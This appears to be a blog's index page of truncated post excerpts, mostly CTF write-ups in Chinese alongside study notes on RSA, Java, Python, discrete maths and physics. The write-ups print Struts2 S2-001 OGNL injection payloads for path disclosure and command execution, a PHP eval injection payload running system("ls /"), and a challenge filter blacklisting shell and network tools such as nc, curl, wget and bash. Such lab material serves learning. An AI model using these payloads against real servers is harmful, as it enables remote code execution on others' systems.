java
CtfshowJava279struts2漏洞 S2-001
在password栏中输入:%{1+1},发现回显2
payload:
12345678// 获取tomcat路径%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}// 获取web路径%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}// 命令执行 env,flag就 ...
Crypto学习笔记
Crypto 密码学非对称密码RSA过程1.取两个质数p和q,相乘得到结果n。
2.由欧拉函数,计算出phin=(p-1)*(q-1)。
3.任取一个小于phin的整数e,满足e与phin互质。
4.取逆元d:d = gmpy2.invert(e,phin)
5.得到公钥:(e,n),私钥(d,n)
加密:明文的e次方,取n的模结果为密文。
解密:密文的d次方,取n的模结果为明文。
题目[BaseCTF 2024] babyrsa 1234567891011121314151617from Crypto.Util.number import *flag=b'BaseCTF{}'m=bytes_to_long(flag)n=getPrime(1024)e=65537c=pow(m,e,n)print("n =",n)print("e =",e)print("c =",c)"""n = 10418322808854221583258685396054 ...
Java笔记
JAVA杂碎知识点x++和++x的区别:
&&运算符的短路求值12345678910public class E { public static void main(String args[]) { int x = 8, y = 8; if (x++ == 9 && ++y == 9) { x = 10; y = 10; } System.out.println("x=" + x + " , y=" + y); }} //x=9,y=8
在if语句中,&&运算符先对左边进行运算:x++此时值为8,不等于9,导致判断结果为false,当已经有一方为false时,整个if语句已是false,导致&&右边的运算不会进行,所以只有x进行了自增操作,而y没有。
switch case123456789101112pu ...
2023愚人杯wp
easy_ssti源码:
12345678910111213141516from flask import Flaskfrom flask import render_template_string,render_templateapp = Flask(__name__)@app.route('/hello/')def hello(name=None): return render_template('hello.html',name=name)@app.route('/hello/<name>')def hellodear(name): if "ge" in name: return render_template_string('hello %s' % name) elif "f" not in name: return render_template_string('hello %s' ...
2024西瓜杯复现
CodeInject12345678<?php#Author: h1xaerror_reporting(0);show_source(__FILE__);eval("var_dump((Object)$_POST[1]);");
(Object)将POST的内容强制类型转换为对象,只用把前面的var_dump函数进行闭合,再塞入system函数,即可实现代码注入。
payload:
11=a);system("ls /"
前面这个a可以是任意的东西,但不能为空
离散数学
基础知识
题目
共有7个字母,其中c和e重复两次。
公式:=7! / 2!*2!
自反性:自己是自己的倍数,倍数是1反对称:6是3的2倍,3不是6的倍数传递性:6是3的倍数,12是6的倍数, 12是3的倍数
Python
字符串、列表操作切片[a:b]
截取第a+1位到b-1位的内容。
[::-1]
倒序过来
拼接+1234a = 'z'b = 'sy'c = a+bprint(c) #zsy
1234a = [1,2]b = [3,4]c = a+bprint(c) #[1,2,3,4]
排序:sort方法:12345my_list = [3, 1, 4, 1, 5, 9, 2, 6, 5, 3, 5]my_list.sort() # 升序排序print(my_list) # [1, 1, 2, 3, 3, 4, 5, 5, 5, 6, 9]my_list.sort(reverse=True) # 降序排序print(my_list) # [9, 6, 5, 5, 5, 4, 3, 3, 2, 1, 1]
输出输出的内容用空格隔开:123ls = ['a','b','c']for i in ls: print(i,end=' ') ...
大学物理(不断更新中...)
考前看看错题部分
重要题目运动学
牢记:
根据题目条件现场推,当遇到不知道的量时也直接带上去,例如:初速度v0,初始位移x0等等。这些量会根据已有信息而获取。
重点:
这题不可以像上面那题一样无脑带公式,注意到本题里要求的是x与v的关系,跟t无关,就可以想方设法把t给约掉,主要运用到了以下公式:
不是很理解原理…大佬的解释如下:
记记公式就ok,计算量好大OmO
力学
要点:
还是那句话,千万不能无脑套公式。观察这里跟t没啥关系,直接把a变成v*dv/dx,然后积分算就完了。
别忘记了动量也是矢量,题目中没有说求大小,就需要加上i和j来表示。
分方向进行求解,最后再求和的思路值得学习。
学习下做题思路就行
答案选B。
不是很懂2和4选项是怎么个事,去问下大佬:
这下懂了=w=
挺好的题目,难点在于怎么想到通过建立坐标系的方式,把漏水这一条件与位移x结合起来。
动能定理应用的典中典中典
个人总结:
W1表示的是初始状态已经垂下去的那节从开始到末状态时重力做的功,W2同理是放在桌子上那节。但是这题的难点就在于W2的列式求解,W2是变力 ...
Ciscn2024 web复现
simple_php1234567891011121314<?phpini_set('open_basedir', '/var/www/html/');error_reporting(0);if(isset($_POST['cmd'])){ $cmd = escapeshellcmd($_POST['cmd']); if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget|\'|\"|id|whoami/i', $cmd)) ...